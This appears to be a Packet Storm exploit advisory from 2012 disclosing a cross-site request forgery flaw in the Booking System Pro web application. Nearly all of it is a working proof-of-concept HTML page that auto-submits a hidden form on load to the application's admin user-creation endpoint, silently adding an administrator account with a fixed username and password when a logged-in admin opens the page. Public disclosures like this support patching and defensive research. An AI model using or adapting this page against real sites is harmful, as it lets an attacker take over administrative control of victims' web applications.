Booking System Pro Cross Site Request Forgery

2012-08-30T00:00:00
ID PACKETSTORM:116095
Type packetstorm
Reporter DaOne
Modified 2012-08-30T00:00:00

Description

                                        
                                            `# Exploit Title: Booking System Pro CSRF Vulnerability  
# Date: 28/08/2012  
# Author: DaOne (@LibyanCA)  
# Vendor: http://www.neptunescripts.com/products  
# Price: $39  
  
  
# CSRF Add Admin  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="http://[target]/admin/users/add">  
<input type="hidden" name="data[User][name]" value="webadmin"/>  
<input type="hidden" name="data[User][username]" value="webadmin">  
<input type="hidden" name="data[User][password]" value="pass123">  
<input type="hidden" name="data[User][email]" value="admin@email.com">  
<input type="hidden" name="data[User][phone]" value=""/>  
<input type="hidden" name="data[User][role]" value="admin"/>  
</form>  
</body>  
</html>  
  
`